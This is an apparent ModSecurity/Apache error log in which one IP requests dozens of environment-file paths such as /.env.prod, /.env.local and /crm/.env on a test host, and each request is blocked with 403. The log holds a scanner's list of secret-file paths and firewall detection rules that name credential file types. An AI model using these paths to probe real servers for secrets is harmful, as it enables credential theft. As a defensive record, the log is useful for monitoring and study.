[Mon Jan 26 21:26:28.445349 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aXfN9IlnPSpEvTj8B1BMzwAAAAg"]
[Mon Jan 26 21:26:28.542187 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aXfN9IlnPSpEvTj8B1BM0gAAAAg"]
[Mon Jan 26 21:26:28.542379 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aXfN9IlnPSpEvTj8B1BM0gAAAAg"]
[Mon Jan 26 21:26:28.542531 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aXfN9IlnPSpEvTj8B1BM0gAAAAg"]
[Mon Jan 26 21:26:28.572483 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM0wAAAAg"]
[Mon Jan 26 21:26:28.572746 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM0wAAAAg"]
[Mon Jan 26 21:26:28.572959 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM0wAAAAg"]
[Mon Jan 26 21:26:28.614071 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM1AAAAAg"]
[Mon Jan 26 21:26:28.614228 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM1AAAAAg"]
[Mon Jan 26 21:26:28.614386 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aXfN9IlnPSpEvTj8B1BM1AAAAAg"]
[Mon Jan 26 21:26:28.641443 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfN9IlnPSpEvTj8B1BM1QAAAAg"]
[Mon Jan 26 21:26:28.641597 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfN9IlnPSpEvTj8B1BM1QAAAAg"]
[Mon Jan 26 21:26:28.641733 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfN9IlnPSpEvTj8B1BM1QAAAAg"]
[Mon Jan 26 21:26:28.676759 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aXfN9IlnPSpEvTj8B1BM1gAAAAg"]
[Mon Jan 26 21:26:28.676927 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aXfN9IlnPSpEvTj8B1BM1gAAAAg"]
[Mon Jan 26 21:26:28.677064 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aXfN9IlnPSpEvTj8B1BM1gAAAAg"]
[Mon Jan 26 21:26:28.737062 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aXfN9IlnPSpEvTj8B1BM2AAAAAg"]
[Mon Jan 26 21:26:28.737158 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aXfN9IlnPSpEvTj8B1BM2AAAAAg"]
[Mon Jan 26 21:26:28.737303 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aXfN9IlnPSpEvTj8B1BM2AAAAAg"]
[Mon Jan 26 21:26:28.737486 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aXfN9IlnPSpEvTj8B1BM2AAAAAg"]
[Mon Jan 26 21:26:28.763367 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aXfN9IlnPSpEvTj8B1BM2QAAAAg"]
[Mon Jan 26 21:26:28.763548 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aXfN9IlnPSpEvTj8B1BM2QAAAAg"]
[Mon Jan 26 21:26:28.763713 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aXfN9IlnPSpEvTj8B1BM2QAAAAg"]
[Mon Jan 26 21:26:28.817124 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXfN9IlnPSpEvTj8B1BM2wAAAAg"]
[Mon Jan 26 21:26:28.817283 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXfN9IlnPSpEvTj8B1BM2wAAAAg"]
[Mon Jan 26 21:26:28.817446 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXfN9IlnPSpEvTj8B1BM2wAAAAg"]
[Mon Jan 26 21:26:29.069504 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3AAAAAg"]
[Mon Jan 26 21:26:29.069731 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3AAAAAg"]
[Mon Jan 26 21:26:29.069936 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3AAAAAg"]
[Mon Jan 26 21:26:29.477568 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3QAAAAg"]
[Mon Jan 26 21:26:29.477791 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3QAAAAg"]
[Mon Jan 26 21:26:29.477989 2026] [:error] [pid 1664894] [client 45.148.10.143:38134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aXfN9YlnPSpEvTj8B1BM3QAAAAg"]
[Mon Jan 26 21:26:34.214586 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aXfN-qrypnbEh-LOXYdXAQAAAAU"]
[Mon Jan 26 21:26:34.214828 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aXfN-qrypnbEh-LOXYdXAQAAAAU"]
[Mon Jan 26 21:26:34.215024 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aXfN-qrypnbEh-LOXYdXAQAAAAU"]
[Mon Jan 26 21:26:36.423751 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAgAAAAU"]
[Mon Jan 26 21:26:36.423992 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAgAAAAU"]
[Mon Jan 26 21:26:36.424189 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAgAAAAU"]
[Mon Jan 26 21:26:36.446673 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAwAAAAU"]
